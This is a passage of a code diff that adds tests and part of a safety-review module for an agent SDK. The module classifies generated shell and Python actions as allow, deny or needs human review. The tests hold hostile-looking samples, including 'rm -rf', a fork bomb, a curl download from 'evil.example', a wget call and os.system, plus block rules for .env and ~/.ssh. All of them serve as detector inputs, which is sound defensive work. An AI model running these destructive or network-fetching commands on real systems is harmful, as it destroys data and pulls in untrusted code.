+    script = tmp_path / "safe.sh"
+    script.write_text("echo hello\n", encoding="utf-8")
+
+    exit_code = cli.main([str(script), "--format", "text"])
+
+    output = capsys.readouterr().out
+    assert exit_code == 0
+    assert "decision: allow" in output
+    assert "risk_level: none" in output
+    assert "rule_id: safe_python" in output
+
+
+def test_cli_returns_one_for_deny(tmp_path, capsys) -> None:
+    cli = _load_cli_module()
+    script = tmp_path / "danger.sh"
+    script.write_text("rm -rf /tmp/demo\n", encoding="utf-8")
+
+    exit_code = cli.main([str(script)])
+
+    output = json.loads(capsys.readouterr().out)
+    assert exit_code == 1
+    assert output["decision"] == "deny"
+    assert output["risk_level"] == "critical"
+    assert output["rule_id"] == "dangerous_delete"
+    assert output["evidence"]
+    assert output["recommendation"]
+
+
+def test_cli_returns_two_for_needs_human_review(tmp_path, capsys) -> None:
+    cli = _load_cli_module()
+    script = tmp_path / "install.sh"
+    script.write_text("npm install left-pad\n", encoding="utf-8")
+
+    exit_code = cli.main([str(script)])
+
+    output = json.loads(capsys.readouterr().out)
+    assert exit_code == 2
+    assert output["decision"] == "needs_human_review"
+    assert output["rule_id"] == "npm_install"
+
+
+def test_cli_loads_policy_and_writes_json_report(tmp_path, capsys) -> None:
+    cli = _load_cli_module()
+    script = tmp_path / "fetch.sh"
+    policy = tmp_path / "policy.yaml"
+    report_file = tmp_path / "reports" / "tool_safety.json"
+    script.write_text("curl https://api.example.com/data\n", encoding="utf-8")
+    policy.write_text(
+        """
+allowed_domains:
+  - api.example.com
+""",
+        encoding="utf-8",
+    )
+
+    exit_code = cli.main([str(script), "--policy", str(policy), "--output", str(report_file)])
+
+    stdout_report = json.loads(capsys.readouterr().out)
+    file_report = json.loads(report_file.read_text(encoding="utf-8"))
+    assert exit_code == 0
+    assert stdout_report["decision"] == "allow"
+    assert stdout_report["rule_id"] == "network_allowlist"
+    assert file_report == stdout_report
+
+
+def test_cli_rejects_explicit_missing_policy_file(tmp_path, capsys) -> None:
+    cli = _load_cli_module()
+    script = tmp_path / "safe.py"
+    missing_policy = tmp_path / "missing.yaml"
+    script.write_text("print('hello')\n", encoding="utf-8")
+
+    with pytest.raises(SystemExit) as exc_info:
+        cli.main([str(script), "--policy", str(missing_policy)])
+
+    captured = capsys.readouterr()
+    assert exc_info.value.code == 2
+    assert "policy file not found" in captured.err
+    assert str(missing_policy) in captured.err
+
+
+def test_cli_scans_500_line_script_under_one_second(tmp_path, capsys) -> None:
+    cli = _load_cli_module()
+    script = tmp_path / "large_safe.py"
+    script.write_text("\n".join("print('hello')" for _ in range(500)) + "\n", encoding="utf-8")
+
+    started_at = time.perf_counter()
+    exit_code = cli.main([str(script)])
+    elapsed = time.perf_counter() - started_at
+
+    output = json.loads(capsys.readouterr().out)
+    assert exit_code == 0
+    assert output["decision"] == "allow"
+    assert elapsed <= 1.0
diff --git a/tests/tools/safety/test_cli_subprocess.py b/tests/tools/safety/test_cli_subprocess.py
new file mode 100644
index 00000000..03952565
--- /dev/null
+++ b/tests/tools/safety/test_cli_subprocess.py
@@ -0,0 +1,44 @@
+"""Tests for standalone tool_safety_check subprocess behavior."""
+
+from __future__ import annotations
+
+import json
+import os
+import subprocess
+import sys
+from pathlib import Path
+
+
+def test_tool_safety_check_subprocess_exit_codes(tmp_path) -> None:
+    script_path = Path(__file__).resolve().parents[3] / "scripts" / "tool_safety_check.py"
+    safe_script = tmp_path / "safe.py"
+    deny_script = tmp_path / "deny.sh"
+    review_script = tmp_path / "review.sh"
+    env = os.environ.copy()
+    env.pop("PYTHONPATH", None)
+    safe_script.write_text("print('ok')\n", encoding="utf-8")
+    deny_script.write_text("rm -rf /tmp/demo\n", encoding="utf-8")
+    review_script.write_text("pip install demo\n", encoding="utf-8")
+
+    safe = subprocess.run([sys.executable, str(script_path), str(safe_script)],
+                          check=False,
+                          capture_output=True,
+                          text=True,
+                          env=env)
+    deny = subprocess.run([sys.executable, str(script_path), str(deny_script)],
+                          check=False,
+                          capture_output=True,
+                          text=True,
+                          env=env)
+    review = subprocess.run([sys.executable, str(script_path), str(review_script)],
+                            check=False,
+                            capture_output=True,
+                            text=True,
+                            env=env)
+
+    assert safe.returncode == 0
+    assert json.loads(safe.stdout)["decision"] == "allow"
+    assert deny.returncode == 1
+    assert json.loads(deny.stdout)["decision"] == "deny"
+    assert review.returncode == 2
+    assert json.loads(review.stdout)["decision"] == "needs_human_review"
diff --git a/tests/tools/safety/test_examples.py b/tests/tools/safety/test_examples.py
new file mode 100644
index 00000000..ec391a8d
--- /dev/null
+++ b/tests/tools/safety/test_examples.py
@@ -0,0 +1,153 @@
+"""Tests for Tool Safety example report and audit artifacts."""
+
+from __future__ import annotations
+
+import importlib.util
+import json
+from pathlib import Path
+
+from trpc_agent_sdk._tool_safety import SafetyReviewer
+
+_EXAMPLE_CASES = {
+    "allow_python": {
+        "path": Path("examples/tool_safety/samples/allow.py"),
+        "action_type": "python",
+        "source": "print('hello from tool safety')\n",
+    },
+    "deny_bash": {
+        "path":
+        Path("examples/tool_safety/samples/deny.sh"),
+        "action_type":
+        "bash",
+        "source": ("# Inert sample: rm -rf /tmp/demo\n"
+                   "printf '%s\\n' 'destructive delete sample is intentionally not executed'\n"),
+    },
+    "needs_human_review_bash": {
+        "path":
+        Path("examples/tool_safety/samples/needs_human_review.sh"),
+        "action_type":
+        "bash",
+        "source": ("# Inert sample: npm install left-pad\n"
+                   "printf '%s\\n' 'dependency install sample is intentionally not executed'\n"),
+    },
+}
+
+
+def test_example_report_matches_current_cli_report_schema() -> None:
+    cli = _load_cli_module()
+    report = _read_example_report()
+    reports = report["reports"]
+
+    assert report["schema_version"] == 1
+    assert {item["decision"] for item in reports} == {"allow", "deny", "needs_human_review"}
+
+    reviewer = SafetyReviewer()
+    for item in reports:
+        case = _EXAMPLE_CASES[item["case"]]
+        review = reviewer.review(
+            case["source"],
+            action_type=case["action_type"],
+            tool_name="tool_safety_check",
+        )
+        expected = {
+            "case": item["case"],
+            "action_type": case["action_type"],
**cli._build_report(review, case["path"]), + } + assert item == expected + + +def test_example_audit_jsonl_lines_are_valid_json() -> None: + records = _read_example_audit_records() + + assert len(records) >= 3 + assert {record["decision"] for record in records} >= {"allow", "deny", "needs_human_review"} + for record in records: + for key in { + "tool_name", + "decision", + "risk_level", + "rule_id", + "blocked", + "latency", + "timestamp", + "input_sha256", + }: + assert key in record + assert isinstance(record["blocked"], bool) + assert isinstance(record["latency"], (int, float)) + assert isinstance(record["timestamp"], str) + assert isinstance(record["input_sha256"], str) + assert len(record["input_sha256"]) == 64 + + +def test_example_audit_matches_current_reviewer_stable_fields() -> None: + records = _read_example_audit_records() + records_by_case = {record["case"]: record for record in records} + reviewer = SafetyReviewer() + + for case_name, case in _EXAMPLE_CASES.items(): + review = reviewer.review( + case["source"], + action_type=case["action_type"], + tool_name="tool_safety_check", + ) + record = records_by_case[case_name] + for key in { + "tool_name", + "decision", + "risk_level", + "rule_id", + "blocked", + "desensitized", + "action_type", + "input_sha256", + "allowed_domains", + "rules_evaluated", + }: + assert record[key] == review.audit[key] + + +def test_example_files_can_be_reloaded() -> None: + report = _read_example_report() + records = _read_example_audit_records() + + assert isinstance(report, dict) + assert isinstance(report["reports"], list) + assert all(isinstance(record, dict) for record in records) + + +def test_cli_scans_public_example_scripts(capsys) -> None: + cli = _load_cli_module() + project_root = Path(__file__).resolve().parents[3] + + for case, expected_exit_code, expected_decision in ( + (_EXAMPLE_CASES["allow_python"], 0, "allow"), + (_EXAMPLE_CASES["deny_bash"], 1, "deny"), + (_EXAMPLE_CASES["needs_human_review_bash"], 2, 
"needs_human_review"), + ): + exit_code = cli.main([str(project_root / case["path"])]) + output = json.loads(capsys.readouterr().out) + + assert exit_code == expected_exit_code + assert output["decision"] == expected_decision + assert output["path"].endswith(str(case["path"])) + + +def _load_cli_module(): + script_path = Path(__file__).resolve().parents[3] / "scripts" / "tool_safety_check.py" + spec = importlib.util.spec_from_file_location("tool_safety_check", script_path) + module = importlib.util.module_from_spec(spec) + assert spec.loader is not None + spec.loader.exec_module(module) + return module + + +def _read_example_report() -> dict: + report_path = Path(__file__).resolve().parents[3] / "examples" / "tool_safety" / "tool_safety_report.json" + return json.loads(report_path.read_text(encoding="utf-8")) + + +def _read_example_audit_records() -> list[dict]: + audit_path = Path(__file__).resolve().parents[3] / "examples" / "tool_safety" / "tool_safety_audit.jsonl" + return [json.loads(line) for line in audit_path.read_text(encoding="utf-8").splitlines() if line.strip()] diff --git a/tests/tools/safety/test_filter.py b/tests/tools/safety/test_filter.py new file mode 100644 index 00000000..91535a74 --- /dev/null +++ b/tests/tools/safety/test_filter.py @@ -0,0 +1,100 @@ +"""Tests for the tool safety filter integration.""" + +from __future__ import annotations + +from types import SimpleNamespace +from unittest.mock import MagicMock +from unittest.mock import patch + +import pytest + +from trpc_agent_sdk.abc import FilterResult +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools import FunctionTool +from trpc_agent_sdk.tools.safety import ToolSafetyFilter + + +@pytest.fixture +def mock_tool_context(): + ctx = MagicMock(spec=InvocationContext) + ctx.agent_context = MagicMock() + ctx.agent = MagicMock() + ctx.agent.before_tool_callback = None + ctx.agent.after_tool_callback 
= None + ctx.agent.parallel_tool_calls = False + return ctx + + +async def test_filter_allows_safe_tool_request() -> None: + safety_filter = ToolSafetyFilter() + rsp = FilterResult() + + with patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=SimpleNamespace(name="safe_tool")): + await safety_filter._before(MagicMock(), {"query": "hello"}, rsp) + + assert rsp.rsp is None + assert rsp.error is None + assert rsp.is_continue is True + + +async def test_filter_blocks_deny_decision_before_tool_runs(mock_tool_context) -> None: + called = False + + def dangerous_tool(command: str): + nonlocal called + called = True + return {"command": command} + + tool = FunctionTool(dangerous_tool, filters=[ToolSafetyFilter()]) + + result = await tool.run_async(tool_context=mock_tool_context, args={"command": "rm -rf /tmp/demo"}) + + assert called is False + assert result["success"] is False + assert result["error"].startswith("TOOL_SAFETY_BLOCKED:") + assert result["safety"]["decision"] == "deny" + assert result["safety"]["rule_id"] == "dangerous_delete" + assert result["safety"]["tool_name"] == "dangerous_tool" + assert result["safety_audit"]["action_type"] == "bash" + + +async def test_filter_blocks_needs_human_review_by_default() -> None: + safety_filter = ToolSafetyFilter() + rsp = FilterResult() + + with patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=SimpleNamespace(name="Bash")): + await safety_filter._before(MagicMock(), {"command": "npm install left-pad"}, rsp) + + assert rsp.is_continue is False + assert rsp.error is None + assert rsp.rsp["safety"]["decision"] == "needs_human_review" + assert rsp.rsp["safety"]["rule_id"] == "npm_install" + + +async def test_filter_policy_allows_allowlisted_network_request() -> None: + safety_filter = ToolSafetyFilter(policy=ToolSafetyPolicy(allowed_domains=("api.example.com", ))) + rsp = FilterResult() + + with patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", 
return_value=SimpleNamespace(name="web_fetch")): + await safety_filter._before(MagicMock(), {"url": "https://api.example.com/v1/items"}, rsp) + + assert rsp.rsp is None + assert rsp.error is None + assert rsp.is_continue is True + + +async def test_filter_can_allow_human_review_decisions_when_configured(mock_tool_context) -> None: + called = False + + def install_tool(command: str): + nonlocal called + called = True + return {"accepted": command} + + tool = FunctionTool(install_tool, filters=[ToolSafetyFilter(block_decisions=("deny", ))]) + + result = await tool.run_async(tool_context=mock_tool_context, args={"command": "npm install left-pad"}) + + assert called is True + assert result == {"accepted": "npm install left-pad"} diff --git a/tests/tools/safety/test_policy.py b/tests/tools/safety/test_policy.py new file mode 100644 index 00000000..0785d846 --- /dev/null +++ b/tests/tools/safety/test_policy.py @@ -0,0 +1,149 @@ +"""Tests for tool safety policy loading and policy-driven review.""" + +from __future__ import annotations + +import pytest + +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety_policy import SafetyPolicyError +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_policy import load_tool_safety_policy + + +def test_load_policy_from_yaml(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: + - api.example.com +blocked_paths: + read_dotenv: + - ".env" + read_ssh: + - "~/.ssh" +allowed_commands: + - python3 +max_timeout: 30 +max_output_size: 4096 +risk_levels: + network_not_allowlisted: critical +""", + encoding="utf-8", + ) + + policy = load_tool_safety_policy(policy_file) + + assert policy.allowed_domains == ("api.example.com", ) + assert policy.blocked_paths_for("read_dotenv") == (".env", ) + assert policy.blocked_paths_for("read_ssh") == ("~/.ssh", ) + assert policy.allowed_commands == ("python3", 
) + assert policy.max_timeout == 30 + assert policy.max_output_size == 4096 + assert policy.risk_level_for("network_not_allowlisted") == "critical" + assert policy.risk_level_for("read_dotenv") == "high" + + +def test_load_policy_with_missing_fields_uses_defaults(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: + - api.example.com +""", + encoding="utf-8", + ) + + policy = load_tool_safety_policy(policy_file) + default_policy = ToolSafetyPolicy.default() + + assert policy.allowed_domains == ("api.example.com", ) + assert policy.blocked_paths == default_policy.blocked_paths + assert policy.allowed_commands == default_policy.allowed_commands + assert policy.max_timeout == default_policy.max_timeout + assert policy.max_output_size == default_policy.max_output_size + assert policy.risk_level_for("read_ssh") == default_policy.risk_level_for("read_ssh") + + +def test_missing_policy_file_uses_defaults(tmp_path) -> None: + policy = load_tool_safety_policy(tmp_path / "missing.yaml") + + assert policy == ToolSafetyPolicy.default() + + +def test_invalid_yaml_format_raises_clear_error(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text("allowed_domains: [", encoding="utf-8") + + with pytest.raises(SafetyPolicyError, match="Invalid tool safety policy YAML"): + load_tool_safety_policy(policy_file) + + +def test_invalid_policy_shape_raises_clear_error(tmp_path) -> None: + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: "api.example.com" +""", + encoding="utf-8", + ) + + with pytest.raises(SafetyPolicyError, match="allowed_domains"): + load_tool_safety_policy(policy_file) + + +def test_allowed_domains_policy_changes_network_decision_without_code_changes(tmp_path) -> None: + source = "curl https://evil.example/download" + default_review = SafetyReviewer().review(source, action_type="bash") + assert 
default_review.decision == "deny" + assert default_review.rule_id == "network_not_allowlisted" + + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +allowed_domains: + - evil.example +""", + encoding="utf-8", + ) + policy = load_tool_safety_policy(policy_file) + + review = SafetyReviewer(policy=policy).review(source, action_type="bash") + + assert review.decision == "allow" + assert review.rule_id == "network_allowlist" + + +def test_allowed_domains_policy_does_not_short_circuit_other_rules() -> None: + policy = ToolSafetyPolicy(allowed_domains=("api.example.com", )) + + review = SafetyReviewer(policy=policy).review( + "curl https://api.example.com/download && rm -rf /tmp/demo", + action_type="bash", + ) + + assert review.decision == "deny" + assert review.rule_id == "dangerous_delete" + + +def test_blocked_paths_policy_changes_path_decision_without_code_changes(tmp_path) -> None: + source = "from pathlib import Path\nprint(Path('.custom_blocked_file').read_text())" + default_review = SafetyReviewer().review(source, action_type="python") + assert default_review.decision == "allow" + assert default_review.rule_id == "safe_python" + + policy_file = tmp_path / "tool_safety_policy.yaml" + policy_file.write_text( + """ +blocked_paths: + read_dotenv: + - ".custom_blocked_file" +""", + encoding="utf-8", + ) + policy = load_tool_safety_policy(policy_file) + + review = SafetyReviewer(policy=policy).review(source, action_type="python") + + assert review.decision == "deny" + assert review.rule_id == "read_dotenv" + assert review.report["evidence"] == ".custom_blocked_file" diff --git a/tests/tools/safety/test_rules.py b/tests/tools/safety/test_rules.py new file mode 100644 index 00000000..0fbff492 --- /dev/null +++ b/tests/tools/safety/test_rules.py @@ -0,0 +1,122 @@ +"""Tests for additional tool safety rules.""" + +from __future__ import annotations + +import pytest + +from trpc_agent_sdk._tool_safety import SafetyReviewer +from 
trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy + + +@pytest.mark.parametrize( + ("source", "action_type", "decision", "rule_id", "finding"), + [ + ( + "import os\nos.system('id')", + "python", + "deny", + "os_system_execution", + "OS system command execution detected.", + ), + ( + "echo safe; whoami", + "bash", + "needs_human_review", + "shell_injection", + "Shell command chaining pattern detected.", + ), + ( + "wget $TARGET_URL", + "bash", + "deny", + "wget_network", + "Wget network command detected.", + ), + ( + "npm install left-pad", + "bash", + "needs_human_review", + "npm_install", + "NPM package installation command detected.", + ), + ( + "apt-get install curl", + "bash", + "needs_human_review", + "apt_install", + "APT package installation command detected.", + ), + ( + "import aiohttp\nasync with aiohttp.ClientSession() as session:\n pass", + "python", + "deny", + "aiohttp_network", + "aiohttp network client usage detected.", + ), + ( + "import socket\nclient = socket.socket()", + "python", + "deny", + "socket_network", + "Socket network usage detected.", + ), + ( + ":(){ :|:& }; :", + "bash", + "deny", + "fork_bomb", + "Fork bomb pattern detected.", + ), + ( + "from concurrent.futures import ThreadPoolExecutor\nThreadPoolExecutor(max_workers=1000)", + "python", + "deny", + "excessive_concurrency", + "Excessive concurrency pattern detected.", + ), + ( + "from pathlib import Path\nPath('big.bin').write_bytes(b'0' * 100000000)", + "python", + "deny", + "large_file_write", + "Large file write pattern detected.", + ), + ], +) +def test_additional_rules_are_independent_and_structured(source, action_type, decision, rule_id, finding) -> None: + review = SafetyReviewer().review(source, action_type=action_type, tool_name="safety_test") + + assert review.decision == decision + assert review.rule_id == rule_id + assert review.finding == finding + assert review.report["finding"] == finding + assert review.report["rule_id"] == rule_id + assert 
review.report["decision"] == decision + assert review.audit["rule_id"] == rule_id + assert review.audit["decision"] == decision + assert rule_id in review.audit["rules_evaluated"] + + +@pytest.mark.parametrize( + ("source", "action_type", "rule_id"), + [ + ("import os\nos.system('id')", "python", "os_system_execution"), + ("echo safe; whoami", "bash", "shell_injection"), + ("wget $TARGET_URL", "bash", "wget_network"), + ("npm install left-pad", "bash", "npm_install"), + ("apt install curl", "bash", "apt_install"), + ("import aiohttp", "python", "aiohttp_network"), + ("import socket", "python", "socket_network"), + (":(){ :|:& }; :", "bash", "fork_bomb"), + ("ThreadPoolExecutor(max_workers=1000)", "python", "excessive_concurrency"), + ("Path('big.bin').write_bytes(b'0' * 100000000)", "python", "large_file_write"), + ], +) +def test_additional_rules_get_risk_level_from_policy(source, action_type, rule_id) -> None: + policy = ToolSafetyPolicy(risk_levels={rule_id: "policy_override"}) + + review = SafetyReviewer(policy=policy).review(source, action_type=action_type) + + assert review.rule_id == rule_id + assert review.report["risk_level"] == "policy_override" + assert review.audit["risk_level"] == "policy_override" diff --git a/tests/tools/safety/test_telemetry.py b/tests/tools/safety/test_telemetry.py new file mode 100644 index 00000000..48407b96 --- /dev/null +++ b/tests/tools/safety/test_telemetry.py @@ -0,0 +1,142 @@ +"""Tests for tool safety telemetry attributes.""" + +from __future__ import annotations + +from unittest.mock import MagicMock +from unittest.mock import patch + +import pytest +from typing_extensions import override + +from examples.tool_safety.wrappers import SafetyReviewedCodeExecutor +from examples.tool_safety.wrappers import SafetyReviewedSkillRunner +from trpc_agent_sdk.abc import FilterResult +from trpc_agent_sdk.code_executors import BaseCodeExecutor +from trpc_agent_sdk.code_executors import CodeBlock +from trpc_agent_sdk.code_executors 
import CodeExecutionInput +from trpc_agent_sdk.code_executors import CodeExecutionResult +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools.safety import ToolSafetyFilter +from trpc_agent_sdk.types import Outcome + + +class RecordingCodeExecutor(BaseCodeExecutor): + """Code executor that returns a fixed successful result.""" + + @override + async def execute_code( + self, + invocation_context: InvocationContext, + code_execution_input: CodeExecutionInput, + ) -> CodeExecutionResult: + del invocation_context, code_execution_input + return CodeExecutionResult(outcome=Outcome.OUTCOME_OK, output="executed") + + +class RecordingSkillTool: + """Skill-like object that returns a fixed successful result.""" + + async def run_async(self, *, tool_context: InvocationContext, args: dict) -> dict: + del tool_context, args + return {"success": True} + + +@pytest.mark.parametrize( + ("args", "decision", "risk_level", "rule_id"), + [ + ({ + "query": "hello" + }, "allow", "none", "safe_python"), + ({ + "command": "rm -rf /tmp/demo" + }, "deny", "critical", "dangerous_delete"), + ({ + "command": "npm install left-pad" + }, "needs_human_review", "medium", "npm_install"), + ], +) +async def test_tool_safety_filter_traces_review_attributes(args, decision, risk_level, rule_id) -> None: + span = MagicMock() + safety_filter = ToolSafetyFilter() + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span), \ + patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=MagicMock(name="demo_tool")): + await safety_filter._before(MagicMock(), args, FilterResult()) + + _assert_safety_attributes(span, decision, risk_level, rule_id) + + +@pytest.mark.parametrize( + ("code_input", "decision", "risk_level", "rule_id"), + [ + (CodeExecutionInput(code="print('hello')"), "allow", "none", "safe_python"), + ( + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="rm -rf /tmp/demo")]), + "deny", + "critical", + 
"dangerous_delete", + ), + ( + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="pip install unsafe-package")]), + "needs_human_review", + "medium", + "package_install", + ), + ], +) +async def test_code_executor_wrapper_traces_review_attributes(code_input, decision, risk_level, rule_id) -> None: + span = MagicMock() + wrapper = SafetyReviewedCodeExecutor(RecordingCodeExecutor()) + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span): + await wrapper.execute_code(MagicMock(), code_input) + + _assert_safety_attributes(span, decision, risk_level, rule_id) + + +@pytest.mark.parametrize( + ("args", "decision", "risk_level", "rule_id"), + [ + ({ + "skill": "demo", + "command": "python scripts/run.py" + }, "allow", "none", "safe_python"), + ({ + "skill": "demo", + "command": "rm -rf /tmp/demo" + }, "deny", "critical", "dangerous_delete"), + ({ + "skill": "demo", + "command": "npm install left-pad" + }, "needs_human_review", "medium", "npm_install"), + ], +) +async def test_skill_wrapper_traces_review_attributes(args, decision, risk_level, rule_id) -> None: + span = MagicMock() + wrapper = SafetyReviewedSkillRunner(RecordingSkillTool()) + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span): + await wrapper.run(MagicMock(), args) + + _assert_safety_attributes(span, decision, risk_level, rule_id) + + +async def test_tool_safety_telemetry_failure_does_not_block_tool_filter() -> None: + span = MagicMock() + span.set_attribute.side_effect = RuntimeError("otel disabled") + safety_filter = ToolSafetyFilter() + rsp = FilterResult() + + with patch("trpc_agent_sdk._tool_safety_telemetry.trace.get_current_span", return_value=span), \ + patch("trpc_agent_sdk.tools.safety._filter.get_tool_var", return_value=MagicMock(name="demo_tool")): + await safety_filter._before(MagicMock(), {"query": "hello"}, rsp) + + assert rsp.rsp is None + assert rsp.error is None + assert rsp.is_continue is 
True + + +def _assert_safety_attributes(span: MagicMock, decision: str, risk_level: str, rule_id: str) -> None: + span.set_attribute.assert_any_call("tool.safety.decision", decision) + span.set_attribute.assert_any_call("tool.safety.risk_level", risk_level) + span.set_attribute.assert_any_call("tool.safety.rule_id", rule_id) diff --git a/tests/tools/safety/test_wrappers.py b/tests/tools/safety/test_wrappers.py new file mode 100644 index 00000000..709b259d --- /dev/null +++ b/tests/tools/safety/test_wrappers.py @@ -0,0 +1,161 @@ +"""Tests for tool safety wrapper examples.""" + +from __future__ import annotations + +import json +from typing_extensions import override +from unittest.mock import MagicMock + +from examples.tool_safety.wrappers import SafetyReviewedCodeExecutor +from examples.tool_safety.wrappers import SafetyReviewedSkillRunner +from trpc_agent_sdk.code_executors import BaseCodeExecutor +from trpc_agent_sdk.code_executors import CodeBlock +from trpc_agent_sdk.code_executors import CodeExecutionInput +from trpc_agent_sdk.code_executors import CodeExecutionResult +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools.safety import SafetyReviewer +from trpc_agent_sdk.types import Outcome + + +class RecordingCodeExecutor(BaseCodeExecutor): + """Code executor that records whether execution was delegated.""" + + called: bool = False + + @override + async def execute_code( + self, + invocation_context: InvocationContext, + code_execution_input: CodeExecutionInput, + ) -> CodeExecutionResult: + del invocation_context, code_execution_input + self.called = True + return CodeExecutionResult(outcome=Outcome.OUTCOME_OK, output="executed") + + +class RecordingSkillTool: + """Skill-like tool that records direct run_async calls.""" + + def __init__(self) -> None: + self.called = False + + async def run_async(self, *, tool_context: InvocationContext, args: dict) -> dict: + del tool_context + self.called = True + return {"success": True, "args": 
args} + + +async def test_code_executor_wrapper_allows_safe_code() -> None: + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner) + + result = await wrapper.execute_code(MagicMock(), CodeExecutionInput(code="print('hello')")) + + assert inner.called is True + assert result.outcome == Outcome.OUTCOME_OK + assert result.output == "executed" + + +async def test_code_executor_wrapper_blocks_deny_without_execution() -> None: + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner) + + result = await wrapper.execute_code( + MagicMock(), + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="rm -rf /tmp/demo")]), + ) + + payload = json.loads(result.output) + assert inner.called is False + assert result.outcome == Outcome.OUTCOME_FAILED + assert payload["success"] is False + assert payload["safety"]["decision"] == "deny" + assert payload["safety"]["rule_id"] == "dangerous_delete" + assert payload["safety_audit"]["tool_name"] == "code_executor" + + +async def test_code_executor_wrapper_returns_human_review_result() -> None: + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner) + + result = await wrapper.execute_code( + MagicMock(), + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", code="pip install unsafe-package")]), + ) + + payload = json.loads(result.output) + assert inner.called is False + assert payload["safety"]["decision"] == "needs_human_review" + assert payload["safety"]["rule_id"] == "package_install" + assert payload["human_review"]["required"] is True + assert payload["human_review"]["status"] == "pending" + + +async def test_code_executor_wrapper_uses_provided_reviewer() -> None: + reviewer = SafetyReviewer(allowed_domains=("api.example.com", )) + inner = RecordingCodeExecutor() + wrapper = SafetyReviewedCodeExecutor(inner, reviewer=reviewer) + + result = await wrapper.execute_code( + MagicMock(), + CodeExecutionInput(code_blocks=[CodeBlock(language="bash", 
code="curl https://api.example.com/items")]), + ) + + assert wrapper.reviewer is reviewer + assert inner.called is True + assert result.outcome == Outcome.OUTCOME_OK + + +async def test_skill_wrapper_allows_safe_command() -> None: + inner = RecordingSkillTool() + wrapper = SafetyReviewedSkillRunner(inner) + + result = await wrapper.run(MagicMock(), {"skill": "demo", "command": "python scripts/run.py"}) + + assert inner.called is True + assert result == {"success": True, "args": {"skill": "demo", "command": "python scripts/run.py"}} + + +async def test_skill_wrapper_blocks_deny_without_running_skill() -> None: + inner = RecordingSkillTool() + wrapper = SafetyReviewedSkillRunner(inner) + + result = await wrapper.run(MagicMock(), {"skill": "demo", "command": "rm -rf /tmp/demo"}) + + assert inner.called is False + assert result["success"] is False + assert result["safety"]["decision"] == "deny" + assert result["safety"]["rule_id"] == "dangerous_delete" + assert result["safety_audit"]["tool_name"] == "skill_run" + + +async def test_skill_wrapper_returns_human_review_result() -> None: + inner = RecordingSkillTool() + wrapper = SafetyReviewedSkillRunner(inner) + + result = await wrapper.run(MagicMock(), {"skill": "demo", "command": "npm install left-pad"}) + + assert inner.called is False + assert result["safety"]["decision"] == "needs_human_review" + assert result["safety"]["rule_id"] == "npm_install" + assert result["human_review"]["required"] is True + assert result["human_review"]["status"] == "pending" + + +async def test_skill_wrapper_can_wrap_callable_and_reuse_reviewer() -> None: + reviewer = SafetyReviewer(allowed_domains=("api.example.com", )) + called = False + + async def runner(tool_context: InvocationContext, args: dict) -> dict: + nonlocal called + del tool_context + called = True + return {"ok": args["url"]} + + wrapper = SafetyReviewedSkillRunner(runner, reviewer=reviewer, tool_name="custom_skill") + + result = await wrapper.run(MagicMock(), {"url": 
"https://api.example.com/data"}) + + assert wrapper.reviewer is reviewer + assert called is True + assert result == {"ok": "https://api.example.com/data"} diff --git a/trpc_agent_sdk/_tool_safety.py b/trpc_agent_sdk/_tool_safety.py new file mode 100644 index 00000000..1a4c2c0c --- /dev/null +++ b/trpc_agent_sdk/_tool_safety.py @@ -0,0 +1,415 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Structured safety review for generated code and shell actions.""" + +from __future__ import annotations + +import hashlib +import re +import time +from dataclasses import dataclass +from typing import Any +from typing import Iterable +from urllib.parse import urlparse + +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_policy import load_tool_safety_policy + + +@dataclass(frozen=True) +class SafetyReview: + """Result of a safety review decision.""" + + decision: str + rule_id: str + finding: str + report: dict[str, Any] + audit: dict[str, Any] + + +@dataclass(frozen=True) +class Rule: + """Pattern-based safety rule.""" + + rule_id: str + decision: str + finding: str + recommendation: str + pattern: re.Pattern[str] + + +_RULES: tuple[Rule, ...] 
